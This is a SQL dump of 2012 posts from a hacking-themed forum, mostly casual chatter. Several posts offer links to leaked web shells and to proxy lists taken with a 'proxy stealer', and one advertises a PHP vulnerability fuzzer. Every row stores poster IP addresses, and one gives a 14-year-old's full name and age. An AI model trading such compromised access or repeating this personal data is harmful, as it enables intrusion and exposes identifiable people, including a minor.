'112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '172', 'MistaCode', '1348158540', 'I would like to get this ;) Thanks in advance dude.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '93d21953d626d02f00a22f15da6a6475', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2398', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348158893', 'Name: Aleksanteri Korhonen Age: 14 Username: MistaCode Profile Link: /user-172.html Are you Unique?: Yeah :D Are you HQ?: Ofcourse I am ! Why do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try! Will you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down !', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '54c98e0435b4e0533434889a35d26384', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2399', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '62', 'R?????zo?', '1348168225', 'I\'m from Portugal: [img]http://portugal.pordescubrir.com/wp-content/uploads/2008/05/mapa-portugal.jpg[/img] heres where i live: [img]http://www.mochileiros.com/otf_pic.php?pic_cat=users_pics&pic_id=user_19194_cascais1.jpg[/img]', '94.132.244.168', '1585771688', '1', '0', '82', '1348170755', '1', '54bb488aa0110c0e8d1abc2d984d3c83', '0', '1348170755'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2404', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348178718', 'Here is some pics of ontario canada This is toronto [img]http://media-cdn.tripadvisor.com/media/photo-s/02/82/46/97/toronto-skyline.jpg[/img] [img]http://www.toronto.ca/attractions/images/aerial_hanlen_large.jpg[/img] Heres meh cottage (A cottage is like a second house on a lake) [img]https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-snc6/270556_10150685955650012_6231596_n.jpg[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '78068f31b0e66c87b3b59920e24554d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2400', '492', '2399', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348168307', '[quote=\'R?????zo?\' pid=\'2399\' dateline=\'1348168225\'] I\'m from Portugal: [img]http://portugal.pordescubrir.com/wp-content/uploads/2008/05/mapa-portugal.jpg[/img] heres where i live: [img]http://www.mochileiros.com/otf_pic.php?pic_cat=users_pics&pic_id=user_19194_cascais1.jpg[/img] I\'m kind of jelly. Such a beautiful place.', '99.253.94.204', '1677549260', '1', '0', '82', '1348170710', '1', '85512562535b606c1a6da99498931399', '0', '1348170710'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2401', '439', '2398', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348169227', '[quote=\'MistaCode\' pid=\'2398\' dateline=\'1348158893\'] Name: Aleksanteri Korhonen Age: 14 Username: MistaCode Profile Link: /user-172.html Are you Unique?: Yeah :D Are you HQ?: Ofcourse I am ! Why do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try! Will you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down ! [/quote] Last question means like what will you contribute in our Unique Section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43f3bbd75bd8deb45030ca64e3f08d15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2402', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '82', 'iTzIpod', '1348169503', 'I don\'t think you should show any \"Adult Content\" anywhere outside of the E-Whoring Section. Please remove it @Reloadzor. OT: I live in Canada, Ontario. Don\'t really have pictures...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b0a58b83d39c6d192074acb3e419c64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2403', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '62', 'R?????zo?', '1348169839', 'I\'ve removed it, even though its not adult content. It\'s a topless beach what to expect :P', '94.132.244.168', '1585771688', '1', '0', '62', '1348169856', '1', '58ef3c574baca39f4c0319931b808824', '0', '1348169856'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2405', '493', '0', '35', 'My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348181350', 'Can you please rate these? Or just rate whichever one you think is the best? NXK has already chosen a Userbar for his Gamer Usergroup if I\'m not mistaken. But I just wanna know which Userbar I made is the best :p [img]http://i.imgur.com/6IrpX.png[/img] [img]http://i.imgur.com/TA6YN.png[/img] [IMG]http://i.imgur.com/X7sfo.png[/IMG] [IMG]http://i.imgur.com/6Qoo4.png[/IMG] [img]http://i.imgur.com/iLWJi.png[/img] [IMG]http://i.imgur.com/r6WJM.png[/IMG] [IMG]http://i.imgur.com/hvGIF.png[/IMG] [IMG]http://i.imgur.com/ordbC.png[/IMG] [IMG]http://i.imgur.com/sNucP.png[/IMG] [IMG]http://i.imgur.com/CWKlk.png[/IMG] [IMG]http://i.imgur.com/jXBZk.png[/IMG] [IMG]http://i.imgur.com/0pJoK.png[/IMG]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '65946ecca2a3ee84d7d563b9ecd85240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2406', '494', '0', '42', 'Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348181688', 'How long can you survive without food? It all depends on a person’s weight, overall health and metabolic rate, but according to scientific data, a human being can’t go much longer than 3 weeks without food. Now, a 22-year-old man from China means to challenge this theory claiming he has survived 12 years on water alone. Ning Xuefa, a young man from China’s Henan province, has recently made headlines for claiming he hasn’t had a bite of food in the last 12 years. Looking at the 1.50-meter-tall, 40-kg-heavy Ning one can tell he doesn’t like to eat much, but his story seems almost impossible to believe. He told Chinese media that he completely renounced food when he was just a 10-year-old child. Just looking at bread or vegetables at the dinner table made him nauseous, and he always had a dry throat and a weird sensation like something was stuck there that made him drink lots of water all day long. He currently consumes up to 15 liters of water in a day, and his father back up his story that he never touches a single scrap of food, whether it’s rice, steamed bread or meat. The closest thing to food that doesn’t make Ning Xuefa sick is milk, but his family is too poor to buy milk for him every day. So the thirsty young man is forced to survive on water alone. He tried to get a job in construction to help out his parents, but his weak body, frail constitution and the constant need to go to the bathroom even at night eventually got him fired. Ning had to return home and depend on his family for help. But, considering his eating habits, I don’t think they consider him a big burden. Ning Xuefa has also been examined by doctors and diagnosed with a rare chronic thirst-inducing disease, but they haven’t yet been able to determine how he was able to survive all these years without any kind of food. Usually I’d be quick to classify this story as bogus, but I remember writing about the Indian Yogi who proved he can survive on air alone, and the woman who didn’t drink water for 78 years. I’ll try to keep an eye on this story to see how it develops. [url=http://www.odditycentral.com/news/chinese-man-has-lived-on-water-alone-for-the-last-12-years.html]Source.[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8d8f9dec749b3048828f2fce45c1549', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2407', '495', '0', '61', 'Fresh Shells!', '0', '82', 'iTzIpod', '1348182692', 'These were from 3 days ago. Still new. Also, these are unchecked. Sorry. Link: http://adf.ly/D20v7', '24.212.197.164', '416597412', '1', '0', '82', '1348182735', '1', '82173d3dcee5cf341bfbb02a42f34380', '0', '1348182735'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2408', '496', '0', '14', 'Free Proxy List', '0', '82', 'iTzIpod', '1348183815', 'Hey LH, This is a Free Proxy List I\'m giving away. (This was leaked) To view: http://adf.ly/D22fs To Download: http://adf.ly/D22jY', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37ea95a7d93765ff34c578ad0544c3a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2409', '497', '0', '61', '10k+ Proxy List', '0', '82', 'iTzIpod', '1348184132', 'Used a Paid Proxy Stealer to get these. To View: http://adf.ly/D233R To Download: http://adf.ly/D23ET', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11181867219b567769ec07b18545f96e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2410', '498', '0', '61', 'Thousands of Private & Public Shells', '0', '82', 'iTzIpod', '1348184444', 'Thousands of HQ and well-working private and public shells leaked from HF. [url=http://adf.ly/D23ZG]Click to View[/url] [url=http://adf.ly/D23Vv]Click to Download[/url]', '24.212.197.164', '416597412', '1', '0', '1', '1348191793', '1', '1227f5849c634a2a9a98bc7efff3157c', '0', '1348191793'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2411', '499', '0', '7', '1 Month', '0', '82', 'iTzIpod', '1348189749', 'It\'s official! :D I have been registered on L33t Hacking for 1 whole month now! :D I\'m so happy. Thanks everyone for being active. Because the more the active, the more the fun. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2239b546db465b535fe0e982601b052e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2412', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348191264', 'Before it these forums get added, what kind of forums would you all like to see?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '912ee46f4e787ad08365eaa8b9f15b02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2413', '499', '2411', '7', 'RE: 1 Month', '0', '194', 'Slender Man', '1348191276', 'Congrats! See you at 2 months! Also my first whole month!', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'd0131583bd1f77ab6824681863dbe672', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2414', '487', '2393', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348191724', '[quote=\'iTzIpod\' pid=\'2393\' dateline=\'1348141307\'] Granted. But you died in a hole and so can no longer wish for anything. xD Wish: I wish I have 100+ Skype Contacts :( #Forever Alone [/quote] Too bad then you would get bombed with advertising messages and have no time for homework. I wish LH becomes so successful that my website would be on the top 10 hacker community list.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '264a8ed5366d8bc7a866bbf089e56f39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2415', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348191889', 'Uhh oh OK, no problem. BTW yes I did like your work.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47bf061ee9bb7331410f1ce7229738bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2416', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348191968', 'Hahahaha lmao. Your userbars suck lol lol, thanks for admitting that your userbars are ugly :P JK They aren\'t that bad :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '966ddbbf0809c756dbc24a3ee8100e0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2417', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '194', 'Slender Man', '1348193539', 'I like the old-fashioned Mario ones. 7/10', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '24ea5f2c660db0f2694342f179545276', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2418', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '194', 'Slender Man', '1348193639', 'I live in Avon, Indiana USA. Don\'t have pics... Sorry.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'a545a4a5b69f760639f6e7368ab524d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2419', '499', '2411', '7', 'RE: 1 Month', '0', '82', 'iTzIpod', '1348194211', 'Lool. Good luck. And thanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b3b1d962f27aa87ea4a8eec7f672a38', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2420', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348194292', 'Granted. But then your account got suspended. (I don\'t know what I just said..) I wish I was the coolest dude in town.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '613d7c05a944864584c938341655f9f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2421', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348194329', 'Ahahaha lol. Thanks :D Means a lot to me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14fbbaa51879b754837c18611f03f61a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2422', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348194651', 'All the games. Or, the popular games? Counter Strike CoD Nexon Games (Maplestory, Dungeon Fighter Online, Combat Arms, etc} Gears of War [b]Minecraft[/b] xD LOL @Bold :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eefef3b766a6c3fc9b3cdfa01e256c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2423', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '53', 'sirchamp', '1348236435', 'Wow I\'d love to live right next to a (topless) beach. @NXK Nice pond or lake in front of your holiday house.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0749f91bbb59c31594ffd2fa2155bb50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2424', '492', '2423', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348241010', '[quote=\'sirchamp\' pid=\'2423\' dateline=\'1348236435\'] Wow I\'d love to live right next to a (topless) beach. @NXK Nice pond or lake in front of your holiday house. [/quote] It\'s a lake aha, That\'s just a river that connects to it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1327c5dae754222cba88a86b51461af4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2425', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '61', 'NXK', '1348245092', 'I\'m using the first one out of that list now, If someone makes something better than ill change it but right now I love the first one.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7e0c067043b1b682fcf650aba3512f84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2426', '439', '2401', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348245262', '[quote=\'iTzIpod\' pid=\'2401\' dateline=\'1348169227\'] [quote=\'MistaCode\' pid=\'2398\' dateline=\'1348158893\'] Name: Aleksanteri Korhonen Age: 14 Username: MistaCode Profile Link: /user-172.html Are you Unique?: Yeah :D Are you HQ?: Ofcourse I am ! Why do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try! Will you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down ! [/quote] Last question means like what will you contribute in our Unique Section? [/quote] Well then it would be, What ever the section needs ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'ca6dc57576ef50fa8487857b1cdb6290', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2427', '487', '2420', '56', 'RE: Corrupt a wish', '0', '61', 'NXK', '1348245265', '[quote=\'iTzIpod\' pid=\'2420\' dateline=\'1348194292\'] Granted. But then your account got suspended. (I don\'t know what I just said..) I wish I was the coolest dude in town. [/quote] but than all the bitches would love you and be like, yo smooth can you teach me how to dougie? I wish i wasn\'t in school right now', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e47f850e39087b399a98e66c6b155304', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2428', '487', '2427', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348255103', '[quote=\'NXK\' pid=\'2427\' dateline=\'1348245265\'] [quote=\'iTzIpod\' pid=\'2420\' dateline=\'1348194292\'] Granted. But then your account got suspended. (I don\'t know what I just said..) I wish I was the coolest dude in town. [/quote] but than all the bitches would love you and be like, yo smooth can you teach me how to dougie? I wish i wasn\'t in school right now [/quote] I don\'t mind if I need to teach bitches how to dougie :cool: Granted. You are now teleported to a club. With a bunch of teachers! :D :roflol: I wish I made a successful Youtube Channel', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '55d5dd4be5e022272c3182ae5bb7e56f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2429', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348255150', '@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc98245dea507cb1630f43e6bf0d9e82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2430', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348255180', 'When are you making the Usergroup though? :o', '24.212.197.164', '416597412', '1', '0', '82', '1348255188', '1', 'e3b86296ad513ff65ab133231f3f884c', '0', '1348255188'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2431', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '2', 'Apathy', '1348260285', 'This seems awesome but sucks for the guy. :3', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '99554c9c3a8f0f981a7180cb6e8f4d02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2432', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348274288', '1. Where are the group requirements? 2. Where are the userbar and the ficon images?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '266558a60847e5f6bfc2f858ade6c672', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2433', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348274353', 'You would be famous and you would have a lot of gay mofos wanting your dick. I wish I can become the president or vice in my HS.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '84a3a13774ff7b6c281a750a61710020', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2434', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '1', 't3h jok3r', '1348274388', 'I survive on water to. I drink water everyday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf98d582b0911da8db8022e6efa19e33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2435', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348274491', 'What exactly is minecraft?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '728f9d5b71f0650d275ecc2167cbc116', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2436', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '5', 'Timmy', '1348274761', 'No one liked my tutorial?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b0222f60ce380de6b36f52578ed599b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2437', '500', '0', '13', 'PHP vulnerability hunter', '0', '5', 'Timmy', '1348274873', '[size=large]PHP Vulnerability Hunter[/size] [size=medium]PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs. [/size] [size=large]Key Features[color=#FF0000][/color][/size] [color=#000000]Automated Input Mapping[/color] [color=#000000]While most web application fuzzers rely on the user to specify application inputs, PHP vulnerability hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting application, PHP Vulnerability Hunter can detected inputs that are not referenced in the forms of the rendered page.[/color] [size=medium]Several Scan Modes[/size] PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation. [color=#FF0000][size=medium]PHP Vulnerability Hunter can detect the following classes of vulnerabilities:[/size][/color] Arbitrary command execution Arbitrary file read/write/change/rename/delete Local file inclusion Arbitrary PHP execution SQL injection User controlled function invocatino User controlled class instantiation Reflected cross-site scripting (XSS) Open redirect Full path disclosure [size=medium]Code Coverage[/size] Get measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level. Scan Phases [size=medium] Initialization Phase[/size] During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs. [size=medium]Scan Phase[/size] This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs. [size=medium]Uninitialization[/size] Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase. :thumbup1: [img]http://i45.tinypic.com/a0xem0.jpg[/img] Virustotal: 